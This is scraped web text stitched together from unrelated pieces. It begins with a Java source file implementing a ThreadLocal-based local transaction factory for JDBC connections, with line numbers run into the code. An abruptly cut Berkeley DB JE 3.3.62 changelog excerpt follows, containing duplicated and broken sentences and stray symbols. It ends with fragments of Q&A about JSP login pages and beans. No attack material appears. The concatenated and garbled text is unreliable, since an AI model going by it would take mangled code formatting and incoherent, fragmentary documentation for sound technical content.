UserTransaction.begin96 * DatabaseConnectionFactory.returnConnection97 * UserTransaction.commit/rollback98 * 99 * 4. Connection is requested in the transaction and returned in the transaction100 * 101 * UserTransaction.begin102 * DatabaseConnectionFactory.requestConnection103 * DatabaseConnectionFactory.returnConnection104 * UserTransaction.commit/rollback105 * 106 * 5. Connection is requested before the transaction and returned in the transaction107 * and then connection is requested again ithe transaction and returned in108 * the transaction109 * 110 * DatabaseConnectionFactory.requestConnection111 * UserTransaction.begin112 * DatabaseConnectionFactory.returnConnection113 * DatabaseConnectionFactory.requestConnection114 * DatabaseConnectionFactory.returnConnection115 * UserTransaction.commit/rollback116 * 117 * 6. Connection is requested before the transaction and returned in the transaction118 * and then connection is requested again ithe transaction and returned after119 * the transaction120 * 121 * DatabaseConnectionFactory.requestConnection122 * UserTransaction.begin123 * DatabaseConnectionFactory.returnConnection124 * DatabaseConnectionFactory.requestConnection125 * UserTransaction.commit/rollback126 * DatabaseConnectionFactory.returnConnection127 *128 * 7. Connection is requested in the transaction and returned in the transaction129 * and then connection is requested again ithe transaction and returned after130 * the transaction131 * 132 * UserTransaction.begin133 * DatabaseConnectionFactory.requestConnection134 * DatabaseConnectionFactory.returnConnection135 * DatabaseConnectionFactory.requestConnection136 * UserTransaction.commit/rollback137 * DatabaseConnectionFactory.returnConnection138 *139 * 8. Connection is requested in the transaction and returned in the transaction140 * and then connection is requested again ithe transaction and returned in141 * the transaction142 * 143 * UserTransaction.begin144 * DatabaseConnectionFactory.requestConnection145 * DatabaseConnectionFactory.returnConnection146 * DatabaseConnectionFactory.requestConnection147 * DatabaseConnectionFactory.returnConnection148 * UserTransaction.commit/rollback149 * 150 * What are the issues:151 * --------------------152 * A. If thread acquires connection before the transaction is started then at153 * the time when the transaction is started we have to associate the 154 * connection with the transaction. 155 * Affects: 1,3,5,6156 * 157 * A.1 If the connection wasn't used within the transaction the the commit or 158 * rollback on transaction should be a no op.159 * 160 * B. If the thread acquired connection during the transaction then this 161 * connection should be automatically associated with the transaction162 * Affects: 2,4,5,6,7,8163 * 164 * C. If thread returns the connection before the transaction is finished then165 * the transaction manager has to keep the connection open until the thread166 * ends the transaction.167 * Affects: 3,4,5,8168 * 169 * D: If the thread keeps the connection after the transaction is finished then170 * after the transaction is finished the connection should be fully usable171 * as any other JDBC connection including autocommit and commit/rollback172 * but in the transaction the autocommit/commit/rollback should be disabled.173 * Affects: 1,2,6,7174 * 175 * E: If the thread requests and returns connection multiple times during the176 * same transaction then the same connection has to be given to it since177 * the transaction is responsible for doing commit/rollback on the connection178 * and our assumption is that the thread is using only single connection.179 * Affects: 5,6,7,8180 * 181 * What are the solutions:182 * -----------------------183 * A: The DatabaseConnectionFactory has to keep track if there is a connection 184 * issued to the calling thread so that when the transaction is started then 185 * this connection can be associated to the transaction.186 * This can be done using ThreadLocal storing the requested connection. Then187 * when the transaction is started, the UserTransaction has to check if there 188 * is an already requested connection and associate it with the transaction. 189 * This can be done using ThreadLocal storing the transactional connection. 190 * 191 * A.1 This can be done be creating wrapper around Connection. 192 * The DatabaseConnectionFactory will then on request and return create this193 * wrapper which delegates all calls into underlying connection. When any 194 * method is called, it marks the connection as used. The transaction manager195 * can then reset the used flag when the connection is first time associated196 * with transaction or check it once commit or rollback were issued. 197 * 198 * B: The DatabaseConnectionFactory has to be aware of the started transaction199 * and when an connection is requested then the connection is associated 200 * with the transaction. 201 * This can be done using ThreadLocal storing a flag if the transaction is202 * in progress or not. If the transaction is in progress then the returned203 * connection will be stored in the transactional connection.204 * 205 * C: The UserTransaction has to keep track of the connection which was used206 * in the transaction and don't allow to return it until the transaction is207 * finished. Then, once the transaction is finished it has to return the 208 * connection.209 * This can be done using ThreadLocal storing a flag for the transactional 210 * connection if the connection was returned in the transaction or not.211 * 212 * D: The connection should be aware if there is a transaction in progress or 213 * not and based on that allow autocommit and commit or rollback or not.214 * This can be done be creating wrapper around Connection. 215 * The DatabaseConnectionFactory will then on request and return create this216 * wrapper which delegates all calls into underlying connection and intercepts217 * and checks autocommit and commit and rollback. 218 * 219 * E. The DatabaseConnectionFactory has to be aware of the started transaction220 * and when a connection is requested then the connection already associated 221 * with the transaction should be returned. 222 * 223 * What are the implications:224 * --------------------------225 * 1. If the connection is associated with transaction it is not returned to the226 * factory and not available for others. This is natural since there are some227 * operations pending on that connection and even though the thread said it 228 * no longer needs it, it cannot be reused until the operations are flushed 229 * with commit/rollback.230 * 231 * Implementation:232 * ---------------233 * 1. D. requires to create wrapper around connection. We will implement 234 * TransactionalConnection class as wrapper around JDBC Connection class, 235 * which will delegate all operations directly except setautocommit/commit/rollback,236 * which will be delegated only after check for pending transaction. 237 * 238 * 2. The previous step required us to create integration between DatabaseTransactionFactory 239 * and DatabaseConnectionFactory, so that the transaction factory can act as 240 * a proxy for connection factory and get the real connection and wrap 241 * it with a wrapper. This will be implemented as a delegator pattern242 * when DatabaseConnectionFactoryImpl will be delegating calls to 243 * DatabaseTransactionFactoryImpl and vice versa.244 * 245 * The requestConnection call will 246 * - check if there is an transaction in progress, if there is and it has 247 * already associated connection then the connection associated with the248 * transaction will be returned.249 * - if there is no transaction in progress and there is already connection 250 * issued then return the same connection since this would represent the 251 * situation (such as subprocedure call)252 * DatabaseConnectionFactory.requestConnection253 * DatabaseConnectionFactory.requestConnection254 * DatabaseConnectionFactory.returnConnection255 * DatabaseConnectionFactory.returnConnection256 * - if there is no transaction in progress and no already issued connection257 * then get connection from underlying connection factory, create wrapper 258 * and remember the connection as issued using ThreadLocal. 259 * This will solve A, B and E260 * 261 * The returnConnection call will262 * - check if there is an transaction in progress, if there is then the 263 * connection will not be returned to the factory and will be returned when264 * the transaction is done265 * - if there is no transaction in progress then the underlying connection 266 * will be returned to the factory267 * This will solve C268 * 269 * 3. We will provide implementation of UserTransaction. 270 * 271 * The begin call will 272 * - check if there was connection issued and if it was, it will associate 273 * it with this transaction. It will also tell the connection that it 274 * is part of the transaction to ignore the setautocommit/commit/rollback275 * calls.276 * 277 * The commit call will278 * - if there is connection associated with this transaction, it will commit 279 * the connection. If the connection was returned to the factory in the 280 * transaction then this time it will be really returned to the factory 281 * otherwise it will be just disassociated from this transaction so that 282 * the setautocommit/commit/rollback calls are no longer ignored.283 * 284 * The rollback call will 285 * - if there is connection associated with this transaction, it will rollback 286 * the connection. If the connection was returned to the factory in the 287 * transaction then this time it will be really returned to the factory 288 * otherwise it will be just disassociated from this transaction so that 289 * the setautocommit/commit/rollback calls are no longer ignored.290 * 291 * TransactionalConnection292 * To distinguish if the TransactionalConnection was associated in transaction293 * it will have inTransaction flag. 294 * To distinguish if the TransactionalConnection was used during the transaction295 * it will have used flag which will be false initially and set to true if 296 * any method on connection is called. 297 * To distinguish if the TransactionalConnection was returned to factory or it 298 * is still used by application it will have active counter which will be 299 * incremented when the connection is requested from factory and decremented300 * when it is returned. 301 * 302 * @version $Id: SimpleLocalTransactionFactoryImpl.java,v 1.7 2007/01/07 06:14:21 bastafidli Exp $303 * @author Miro Halas304 * @code.reviewer Miro Halas305 * @code.reviewed 1.4 2006/05/24 15:18:32 bastafidli306 */307 public class SimpleLocalTransactionFactoryImpl extends DatabaseTransactionFactoryImpl308 implements UserTransaction 309 {310 // Constants ////////////////////////////////////////////////////////////////311 312 /**313 * A transaction is associated with the target object and it is in the active state.314 */ 315 public static final Integer STATUS_ACTIVE_OBJ 316 = new Integer (Status.STATUS_ACTIVE);317 318 /**319 * A transaction is associated with the target object and it has been committed.320 */ 321 public static final Integer STATUS_COMMITTED_OBJ 322 = new Integer (Status.STATUS_COMMITTED);323 324 /**325 * A transaction is associated with the target object and it is in the process326 * of committing.327 */ 328 public static final Integer STATUS_COMMITTING_OBJ 329 = new Integer (Status.STATUS_COMMITTING);330 331 /**332 * A transaction is associated with the target object and it has been marked 333 * for rollback, perhaps as a result of a setRollbackOnly operation.334 */ 335 public static final Integer STATUS_MARKED_ROLLBACK_OBJ 336 = new Integer (Status.STATUS_MARKED_ROLLBACK);337 338 /**339 * No transaction is currently associated with the target object.340 */ 341 public static final Integer STATUS_NO_TRANSACTION_OBJ 342 = new Integer (Status.STATUS_NO_TRANSACTION);343 344 /**345 * A transaction is associated with the target object and it has been prepared, i.e.346 */ 347 public static final Integer STATUS_PREPARED_OBJ 348 = new Integer (Status.STATUS_PREPARED);349 350 /**351 * A transaction is associated with the target object and it is in the process352 * of preparing.353 */ 354 public static final Integer STATUS_PREPARING_OBJ 355 = new Integer (Status.STATUS_PREPARING);356 357 /**358 * A transaction is associated with the target object and the outcome has been359 * determined as rollback.360 */ 361 public static final Integer STATUS_ROLLEDBACK_OBJ 362 = new Integer (Status.STATUS_ROLLEDBACK);363 364 /**365 * A transaction is associated with the target object and it is in the process366 * of rolling back.367 */ 368 public static final Integer STATUS_ROLLING_BACK_OBJ 369 = new Integer (Status.STATUS_ROLLING_BACK);370 371 /**372 * A transaction is associated with the target object but its current status373 * cannot be determined.374 */ 375 public static final Integer STATUS_UNKNOWN_OBJ 376 = new Integer (Status.STATUS_UNKNOWN);377 378 // Attributes ///////////////////////////////////////////////////////////////379 380 /**381 * Database connection which this thread requested from the factory. The 382 * current assumption is that the thread can have only one connection at 383 * a time. The connection can be part of global transaction (since there is 384 * only one transaction per thread then this connection really represents 385 * the transaction). The stored data have type TransactionConnection.386 */387 private ThreadLocal m_connection; 388 389 /**390 * This is the real database connection which is wraped in TransactionConnection391 * since the TransactionConnection doesn't allow us to access it.392 */393 private ThreadLocal m_realConnection; 394 395 /**396 * Transaction that is currently in progress if any. The current assumption397 * is that there can be only one transaction active per thread. The stored398 * data have type Integer with values defined in javax.transaction.Status399 * interface.400 */401 private ThreadLocal m_transaction;402 403 // Cached values ////////////////////////////////////////////////////////////404 405 /**406 * Logger for this class407 */408 private static Logger s_logger = Log.getInstance(SimpleLocalTransactionFactoryImpl.class);409 410 // Constructors /////////////////////////////////////////////////////////////411 412 /**413 * Default constructor using default database connection factory.414 * 415 * @throws OSSException - an error has occured 416 */417 public SimpleLocalTransactionFactoryImpl(418 ) throws OSSException419 {420 super();421 422 // Don't make it inheritable so that spawn threads can have their own423 // connections and transactions424 m_connection = new ThreadLocal ();425 m_transaction = new ThreadLocal ();426 m_realConnection = new ThreadLocal ();427 }428 429 // DatabaseTransactionFactory methods ///////////////////////////////////////////////430 431 /**432 * {@inheritDoc}433 */434 public UserTransaction requestTransaction()435 {436 // This class acts also as user transaction437 UserTransaction transaction = this;438 439 if (s_bTransactionMonitor)440 {441 transaction = new DelegatingUserTransaction(transaction);442 }443 return transaction;444 }445 446 /**447 * {@inheritDoc}448 */449 public void reset(450 ) throws OSSException451 {452 // The only thing we can do is reset the thread local again. This method453 // should be used only for testing454 s_logger.severe("About to reset state of transaction manager." +455 " Hope you know what you are doing.");456 m_connection = new ThreadLocal ();457 m_transaction = new ThreadLocal ();458 m_realConnection = new ThreadLocal (); 459 }460 461 /**462 * {@inheritDoc}463 */464 public void stop(465 ) throws OSSException466 {467 // The transaction factory stop is noop since we don't do here anything 468 // special 469 }470 471 /**472 * {@inheritDoc}473 */474 public TransactionManager getTransactionManager(475 )476 {477 // There is no transaction manager for this factory since it would require478 // us to implement the XA classes it references and we really care only479 // about UserTransaction480 return null;481 }482 483 // UserTransaction methods //////////////////////////////////////////////////484 485 /**486 * {@inheritDoc}487 */488 public void begin(489 ) throws NotSupportedException , 490 SystemException 491 {492 try493 {494 if (isTransactionInProgress())495 {496 throw new NotSupportedException ("Cannot start another transaction while" +497 " one is still in progress."); 498 }499 else500 {501 m_transaction.set(STATUS_ACTIVE_OBJ);502 503 TransactionalConnection existingConnection;504 505 existingConnection = (TransactionalConnection)m_connection.get();506 if (existingConnection != null)507 {508 // There is already a connection issued from the factory which 509 // was issued before the transaction was started so make sure 510 // the connection knows it is in transaction so it doesn't allow511 // commit/rollback/setautocommit512 if (GlobalConstants.ERROR_CHECKING)513 {514 assert (!existingConnection.isInTransaction())515 : "Connection cannot be already in transaction when" +516 " transaction is only starting.";517 }518 519 try520 {521 // The connection wasn't used in transaction yet522 existingConnection.setUsed(false);523 existingConnection.setInTransaction(true);524 }525 catch (SQLException sqleExc)526 {527 SystemException sysExc = new SystemException (528 "Cannot associate connection with transaction.");529 sysExc.initCause(sqleExc);530 throw sysExc;531 }532 }533 else534 {535 // If there is no connection then we don't have to worry about 536 // and anything when the connection will be requested from the 537 // factory it will be associated to this transaction.538 }539 }540 }541 catch (OSSException ossExc)542 {543 throw new SystemException ("Error occured while retrieving information " +544 "about transaction status.");545 }546 }547 548 /**549 * {@inheritDoc}550 */551 public void commit(552 ) throws RollbackException , 553 HeuristicMixedException , 554 HeuristicRollbackException , 555 SecurityException , 556 IllegalStateException , 557 SystemException 558 {559 endTransaction(true);560 }561 562 /**563 * {@inheritDoc}564 */565 public int getStatus(566 ) throws SystemException 567 {568 Integer iTransactionStatus = (Integer )m_transaction.get();569 int iStatus;570 571 if (iTransactionStatus == null)572 {573 iStatus = Status.STATUS_NO_TRANSACTION;574 }575 else576 {577 iStatus = iTransactionStatus.intValue();578 }579 580 return iStatus; 581 }582 583 /**584 * {@inheritDoc}585 */586 public void rollback(587 ) throws IllegalStateException , 588 SecurityException , 589 SystemException 590 {591 endTransaction(false);592 }593 594 /**595 * {@inheritDoc}596 */597 public void setRollbackOnly(598 ) throws IllegalStateException , 599 SystemException 600 {601 try602 {603 if (isTransactionInProgress())604 {605 m_transaction.set(STATUS_MARKED_ROLLBACK_OBJ);606 }607 else608 {609 throw new IllegalStateException ("No transaction in progress to be marked" +610 " rollbacked only."); 611 }612 }613 catch (OSSException ossExc)614 {615 throw new SystemException ("Error occured while retrieving information " +616 "about transaction status.");617 }618 }619 620 /**621 * {@inheritDoc}622 */623 public void setTransactionTimeout(624 int arg0625 ) throws SystemException 626 {627 // At this time there is no way how to set time out for transaction628 // TODO: Feature: Implement transaction timeout for this factory629 } 630 631 // Helper methods ///////////////////////////////////////////////////////////632 633 /**634 * Check if there is an transaction in progress, if there is and it has 635 * already associated connection then the connection associated with the636 * transaction will be returned.637 * If there is no transaction in progress and there is already connection 638 * issued then return the same connection since this would represent the 639 * situation (such as subprocedure call)640 * DatabaseConnectionFactory.requestConnection641 * DatabaseConnectionFactory.requestConnection642 * DatabaseConnectionFactory.returnConnection643 * DatabaseConnectionFactory.returnConnection644 * If there is no transaction in progress and no already issued connection645 * then get connection from the calling connection factory, create wrapper 646 * and remember the connection as issued using ThreadLocal.647 * 648 * @param bAutoCommit {@inheritDoc}649 * @param strDataSourceName {@inheritDoc}650 * @param strUser {@inheritDoc}651 * @param strPassword {@inheritDoc}652 * @param connectionFactory {@inheritDoc}653 * @return {@inheritDoc}654 * @throws OSSDatabaseAccessException {@inheritDoc}655 */656 protected Connection requestTransactionalConnection(657 boolean bAutoCommit,658 String strDataSourceName, 659 String strUser, 660 String strPassword, 661 DatabaseConnectionFactoryImpl connectionFactory662 ) throws OSSDatabaseAccessException663 {664 TransactionalConnection existingConnection;665 Connection existingRealConnection;666 boolean bTransaction;667 668 existingConnection = (TransactionalConnection)m_connection.get();669 existingRealConnection = (Connection )m_realConnection.get();670 try671 {672 bTransaction = isTransactionInProgress();673 }674 catch (SystemException sysExc)675 {676 throw new OSSDatabaseAccessException(677 "There was an exception occured while retrieving UserTransaction " +678 "status.", sysExc);679 }680 catch (OSSException osseExc)681 {682 throw new OSSDatabaseAccessException(683 "There was an exception occured while retrieving UserTransaction " +684 "status.", osseExc);685 }686 687 if (existingConnection != null)688 { 689 // There is already a connection issued from the factory so it should690 // be already associated with transaction so test for it 691 if (GlobalConstants.ERROR_CHECKING)692 {693 assert (((!existingConnection.isInTransaction()) && (!bTransaction))694 || ((existingConnection.isInTransaction()) && (bTransaction)))695 : "Connection status about transaction in progress doesn't" +696 " match the reality.";697 assert existingConnection.verifyConnection(existingRealConnection)698 : "The real database connection is not the one which is wrapped" +699 " in transactional wrapper.";700 }701 702 // Now make sure that this is connection for the same user as requested703 String strCurrentDataSourceName;704 String strExistingDataSourceName;705 String strExistingUser;706 String strExistingPassword;707 708 if (strDataSourceName == null)709 {710 strCurrentDataSourceName = connectionFactory.getDefaultDataSourceName();711 }712 else713 {714 strCurrentDataSourceName = strDataSourceName;715 }716 strExistingDataSourceName = existingConnection.getDataSourceName();717 strExistingUser = existingConnection.getUser();718 strExistingPassword = existingConnection.getPassword();719 720 // I think we do want to compare as == since we want to verify that the721 // same connection factory for which we already have connection722 // is trying to get a new one723 if (connectionFactory != existingConnection.getConnectionFactory())724 {725 throw new OSSDatabaseAccessException(726 "Cannot issue connection from the factory for a different" +727 " connection factory that the factory for which the" +728 " connection is already issued."); 729 }730 731 if ((((strCurrentDataSourceName == null) && (strExistingDataSourceName == null))732 || ((strCurrentDataSourceName != null) 733 && (strCurrentDataSourceName.equals(strExistingDataSourceName))))734 && (((strUser == null) && (strExistingUser == null))735 || ((strUser != null) && (strUser.equals(strExistingUser))))736 && (((strPassword == null) && (strExistingPassword == null))737 || ((strPassword != null) && (strPassword.equals(strExistingPassword)))))738 { 739 // Make this connection active again since we are issuing it from 740 // the factory741 existingConnection.setActive(true);742 }743 else744 {745 // The data source, user name or password doesn't match so do not746 // return connection since the assumption is that there can be747 // only one connection at a time748 throw new OSSDatabaseAccessException(749 "Cannot issue connection from the factory for a different" +750 " user than the user for which the connection is already issued.");751 }752 }753 else754 {755 Connection realConnection;756 757 // There is no connection yet so create a new one. Here we have to758 // call the non transaction version of the requestConnection method759 // since the transactional version is the one which called us.760 realConnection = super.requestTransactionalConnection(bAutoCommit, 761 strDataSourceName, strUser, strPassword, 762 connectionFactory);763 764 if (strDataSourceName == null)765 {766 strDataSourceName = connectionFactory.getDefaultDataSourceName();767 }768 769 existingConnection = new TransactionalConnection(770 realConnection,771 strDataSourceName,772 strUser,773 strPassword,774 bTransaction,775 connectionFactory);776 // Remember this connection777 m_connection.set(existingConnection);778 // Remember the real connection since we will need to return it and779 // the TransactionalConnection doesn't allow us to access it 780 m_realConnection.set(realConnection);781 }782 783 return existingConnection;784 }785 786 /**787 * {@inheritDoc}788 */789 protected void returnTransactionalConnection(790 Connection cntDBConnection,791 DatabaseConnectionFactoryImpl connectionFactory792 )793 {794 if (cntDBConnection != null)795 {796 if (cntDBConnection instanceof TransactionalConnection)797 {798 // This is a transaction aware connection so process it as such799 TransactionalConnection connection;800 Connection realConnection;801 802 connection = (TransactionalConnection)cntDBConnection; 803 realConnection = (Connection )m_realConnection.get();804 if (GlobalConstants.ERROR_CHECKING)805 {806 TransactionalConnection existingConnection;807 existingConnection = (TransactionalConnection)m_connection.get();808 809 // The returned connection is not the one we think we issued so this 810 // is error811 assert (existingConnection != null) 812 && (existingConnection == connection) // this should be ==813 : "The returned connection is not the one we think we issued: " +814 " existing connection is " + existingConnection + 815 " returned connection is " + connection;816 assert existingConnection.verifyConnection(realConnection)817 : "The real database connection is not the one which is wrapped" +818 " in transactional wrapper.";819 // This should be ==820 assert connectionFactory == existingConnection.getConnectionFactory()821 : "Cannot issue connection from the factory for a different" +822 " connection factory that the factory for which the" +823 " connection is already issued."; 824 }825 826 // Mark it as inactive since we are returning it827 connection.setActive(false);828 // Since the connection could have been requested multiple times, it can829 // still be active (it has to be returned the same amount of times)830 if ((!connection.isInTransaction()) && (!connection.isActive()))831 {832 // This connection is not part of the transaction and it is not 833 // active anymore so return it back to the real factory by calling834 // the nontransactional method835 super.returnTransactionalConnection(realConnection, connectionFactory);836 // Also since this connection is completely released, release it837 m_connection.set(null);838 m_realConnection.set(null);839 }840 else841 {842 // The connection is part of the transaction so the transaction will843 // return it when it is done or if the connection is still active 844 // even after it was set inactive that means that the connection was845 // requested multiple times and must be returned multiple times.846 }847 }848 else849 {850 // This is just a regular connection which may have been allocated851 // before the transaction factory was created so just return it852 super.returnTransactionalConnection(cntDBConnection, connectionFactory);853 }854 }855 }856 857 /**858 * End active transaction by commit or rollback.859 * 860 * @param bCommit - if true then transaction will be commited otherwise861 * it will be rollbacked.862 * @throws SystemException - and error has occured during commit/rollback863 */864 protected void endTransaction(865 boolean bCommit866 ) throws SystemException 867 {868 Integer iTransactionStatus = (Integer )m_transaction.get();869 870 if (iTransactionStatus != null)871 {872 if (iTransactionStatus.intValue() == Status.STATUS_MARKED_ROLLBACK)873 {874 // We have to rollback.875 bCommit = false;876 }877 878 if (iTransactionStatus.intValue() == Status.STATUS_ACTIVE)879 {880 try881 {882 TransactionalConnection existingConnection;883 884 existingConnection = (TransactionalConnection)m_connection.get();885 if (existingConnection != null)886 {887 // There was connection associated with this transaction888 if (GlobalConstants.ERROR_CHECKING)889 {890 assert existingConnection.isInTransaction()891 : "The connection is not associated to transaction.";892 }893 894 // The connection was used inside of transaction so lets895 // disassociate it with transaction which will allow us896 // to commit/rollback on the connection897 try898 {899 existingConnection.setInTransaction(false);900 // Now commit/rollback901 if (bCommit)902 {903 if (existingConnection.isUsed())904 {905 // Commit the connection only if it was used in transaction906 existingConnection.commit();907 }908 // We have to always change the state of the transaction909 m_transaction.set(STATUS_COMMITTED_OBJ);910 }911 else912 {913 if (existingConnection.isUsed())914 {915 // Rollback the connection only if it was used in transaction916 existingConnection.rollback();917 }918 // We have to always change the state of the transaction919 m_transaction.set(STATUS_ROLLEDBACK_OBJ);920 }921 // Since we flushed all operations, the connection is not922 // used anymore923 existingConnection.setUsed(false);924 }925 catch (SQLException sqleExc)926 {927 SystemException sysExc;928 if (bCommit)929 {930 sysExc = new SystemException (931 "An error has occured during commit.");932 }933 else934 {935 sysExc = new SystemException (936 "An error has occured during rollback.");937 }938 sysExc.initCause(sqleExc);939 throw sysExc;940 }941 if (!existingConnection.isActive())942 {943 // The connection is no longer active so we need to 944 // return it back to the factory945 Connection realConnection;946 947 realConnection = (Connection )m_realConnection.get();948 if (GlobalConstants.ERROR_CHECKING)949 {950 assert existingConnection.verifyConnection(realConnection)951 : "The real database connection is not the one which is wrapped" +952 " in transactional wrapper.";953 }954 // This connection is not part of the transaction and it 955 // is not active anymore so return it back to the real factory.956 existingConnection.getConnectionFactory().returnNonTransactionalConnection(957 realConnection);958 // Also since this connection is completely released, release it959 m_connection.set(null);960 m_realConnection.set(null);961 }962 }963 else964 {965 // If there wasn't any active connection that means nothing was966 // done inside of the transaction so we just need to reset967 // the status968 if (bCommit)969 {970 m_transaction.set(STATUS_COMMITTED_OBJ);971 }972 else973 {974 m_transaction.set(STATUS_ROLLEDBACK_OBJ);975 }976 }977 }978 finally979 {980 // This is here just to check that once we are done with the code981 // above we have somehow completed transaction status (that mean982 // every branch somehow sets correctly) transaction status. The983 // reason is that we had a bug here when the transaction wasn't984 // reset if there was no work performed in the transaction985 if (GlobalConstants.ERROR_CHECKING)986 {987 iTransactionStatus = (Integer )m_transaction.get();988 // We can use == since only these two constants can be set989 assert ((iTransactionStatus == STATUS_ROLLEDBACK_OBJ)990 || (iTransactionStatus == STATUS_COMMITTED_OBJ))991 : "Transaction wasn't commited nor rollbacked.";992 }993 }994 }995 else996 {997 if (bCommit)998 {999 throw new IllegalStateException (1000 "Transaction cannot be commited if it wasn't started.");1001 }1002 else1003 {1004 throw new IllegalStateException (1005 "Transaction cannot be rollbacked if it wasn't started.");1006 }1007 }1008 }1009 else1010 {1011 if (bCommit)1012 {1013 throw new IllegalStateException (1014 "Transaction cannot be commited if it wasn't started.");1015 }1016 else1017 {1018 throw new IllegalStateException (1019 "Transaction cannot be rollbacked if it wasn't started.");1020 }1021 }1022 }1023}1024
Java API By Example, From Geeks To Geeks. | Our Blog | Conditions of Use | About Us_ | | http://kickjava.com/src/org/opensubsystems/core/persist/db/transaction/SimpleLocalTransactionFactoryImpl.java.htm | CC-MAIN-2017-30 | en | refinedweb |
The changes between 3.2.76 and 3.3.62 are described directly below.
The change is forward compatible in that JE files created with release 3.2.* and earlier can be read when opened with JE 3.3.62. The change is not backward compatible in that files created with JE 3.3.62 cannot be read by earlier releases. Note that if an existing environment is opened read/write, a new log file is written by JE 3.3.62 section.]
return operation and byte counts for the number of random and sequential disk IOs. All values are approximate and may differ from the actual number of operations/byte-counts depending on the type of disks and file system, disk geometry, and file system cache size. [#16086]return operation and byte counts for the number of random and sequential disk IOs. All values are approximate and may differ from the actual number of operations/byte-counts depending on the type of disks and file system, disk geometry, and file system cache size. [#16086]]
If the application used a custom comparator defined asIf the application used a custom comparator defined as[]>>)
public class MyCompare implements Comparator, Serializablethat should now be declared as
public class MyCompare implements Comparator<byte[]>, SerializablePlease note that while these are fine:
Comparator<byte[]> compareInstance = new MyCompare(); dbConfig.setBtreeComparator(compareInstance);or
dbConfig.setBtreeComparator(MyCompare.class);the following previously legal line will now provoke a compile error:
dbConfig.setBtreeComparator(compareInstance.getClass());The compile error is puzzling and regrettably breaks compile time compatibility with JE 3.2 and earlier, but comes about because in Java, due to its type erasure based generics scheme, all the instances of a generic class have the same runtime class. Instead, the application has to apply the following cast:
dbConfig.setBtreeComparator((Class<? extends Comparator<byte[]>>) compareInstance.getClass()); | http://www.oracle.com/technetwork/products/berkeleydb/downloads/je3362-changelog-083569.html | CC-MAIN-2015-06 | en | refinedweb |
Hi All,
I need to replace Perl's built-in open() function. The reason I want to
do this is described in detail in another recent post of mine.
In a nutshell, I have to do encoding conversions on filename arguments
(unicode -> CP932).
Actually, it's not only open() I need to wrap, but open() appears
to be the most flexible beast of those, and I'd very much appreciate if
some of you wise monks could take a look at what I currently have, and
let me know if I've overlooked something...
_____ I18N/Japanese.pm (the 'compatibility' module) _____
package I18N::Japanese;
use Encode 'encode';
use Symbol 'qualify_to_ref';
# eventually, determine this dynamically
my $encoding = "cp932";
# this is meant to take effect for whoever uses us
require encoding; encoding->import($encoding);
# override/wrap Perl built-ins that take or return filenames
# (... snippage of all but open()-wrapper)
*CORE::GLOBAL::open = sub (*@) {
my $fhref = \$_[0];
my $autov = !defined $_[0];
my $fh = qualify_to_ref(shift, scalar caller);
# pass filehandle up to caller when "open my $f, ..."
$$fhref = $fh if $autov;
my ($arg2, $arg3, @args) = convert_encoding(@_);
# need to handle the different prototypes seperately
if (@_ >= 3) {
CORE::open $fh, $arg2, $arg3, @args;
} elsif (@_ == 2) {
if (defined $arg3) {
CORE::open $fh, $arg2, $arg3;
} else {
# must be undef _syntactically_
CORE::open $fh, $arg2, undef;
}
} elsif (@_ == 1) {
CORE::open $fh, $arg2;
} else {
CORE::open $fh;
}
};
sub convert_encoding {
return ( map ref(\$_) eq 'SCALAR' ? encode($encoding, $_) : $_, @_
+ );
}
1;
[download]
_____ using the replaced open() _____
use I18N::Japanese;
open F, ">", "myfile" and print F "foo\n";
open my $f, ">", "myfile" or die $!;
print $f "foo\n";
# ...
[download]
I believe this code is able to handle all various usages of open() ...
but please don't hesitate to prove me wrong ;) Otherwise, well, I'd be
glad to share this snippet with whoever in need might google this up in
the future.
(Note: the encoding conversion aspect is not what I'm worried about
at the moment, but rather whether the replaced open() is still behaving
like the built-in one, interface-wise)
Thanks,
Almut
BTW, what operating Windows you have..?Err, what system operates your windows?what is your $^O? :)
All in all, you'll better off overriding 'open' for such purposes, the danger do not worth the risk!
If your $^O is MSWin32, then following my advice could help: Re: enumerate windows unicode filenames
HTH
I deliberately chose to use CORE::GLOBAL in my specific case
(despite the unless-you-know-what-you're-doing type of warnings in
"Overriding Built-in Functions", Chap 11.3, the Camel Book).
Only having a vague idea of what the existing code1
looks like, I thought that, all in all, I might be better off replacing
the built-ins globally. As I understand it, Exporter does only
export into a specific namespace, e.g.
_____ MySystem.pm _____
package MySystem;
use Exporter 'import';
@EXPORT = qw(system);
sub system {
print "wrapped system(): @_\n";
}
1;
[download]
_____ test.pl _____
#!/usr/bin/perl
use MySystem;
system "echo foo";
package SomeOtherModule;
system "echo bar";
[download]
would print
$ ./test.pl
wrapped system(): echo foo
bar
[download]
i.e. the second call of system() is not being wrapped...
I'd rather not have to take care of such subleties (not all that
sure I'm not getting myself into other subtleties this way, though... ;)
Could you elaborate on why not to use CORE:: ?
Almut
_____
1
as I mentioned in Using literal Japanese filenames in legacy CP932 encoding with system(), etc., the idea behind writing a jperl
compatibility module is that the large number of existing scripts wouldn't need to be | http://www.perlmonks.org/?node_id=580833 | CC-MAIN-2015-06 | en | refinedweb |
#include <Xm/Text.h> void XmTextReplace( Widget widget, XmTextPosition from_pos, XmTextPosition to_pos, char * value);
XmTextReplace replaces part of the text string in the Text. The XmNmotionVerifyCallback is generated if to_pos is less than or equal to the cursor position and the length of value is not the same as the length of the text being replaced, or if the cursor position is between from_pos and to_pos, and the distance from the cursor position to from_pos is greater than the length of value.
For a complete definition of Text and its associated resources, see XmText(3).
XmText(3) and XmTextReplaceWcs(3). | http://www.makelinux.net/man/3/X/XmTextReplace | CC-MAIN-2015-06 | en | refinedweb |
Login Authentication using Bean and Servlet In JSP
Login Authentication using Bean and Servlet In JSP... developed a web application of
login authentication using Bean in JSP. Five... a webpage "loginbean.jsp" to
set the parameter using JSP Bean and forward login page
jsp login page hi tell me how to create a login page using jsp and servlet and not using bean... please tell how to create a database in sql server... please tell with code application
login application how to create login application ?
Hi,
Please check the following tutorials:
Video tutorial - JSP Login Logout Example
Login Authentication using Bean and Servlet In JSP
simple code to login user
bean object
-beans.shtml object i have to retrieve data from the database and want to store in a variable using rs.getString and that variable i have to use in dropdown
Login & Registration - JSP-Servlet
Login & Registration Pls tell how can create login and registration step by step in servlet.
how can show user data in servlet and how can add and remove user only in servlet. Hi Friend,
Please visit... for a particular
request and define controller by using bean properties adding following... to add validator
for a login request. The Code for dispatcher-servlet servlet.xml
login page with mysql using jsp
login page with mysql using jsp pls i need a sample of login page to check username and password in mysql database.
thanks
bean - JSP-Interview Questions
bean what is use bean in jsp? Hi Friend,
Please visit the following links:
Hope
create login page using data from text file
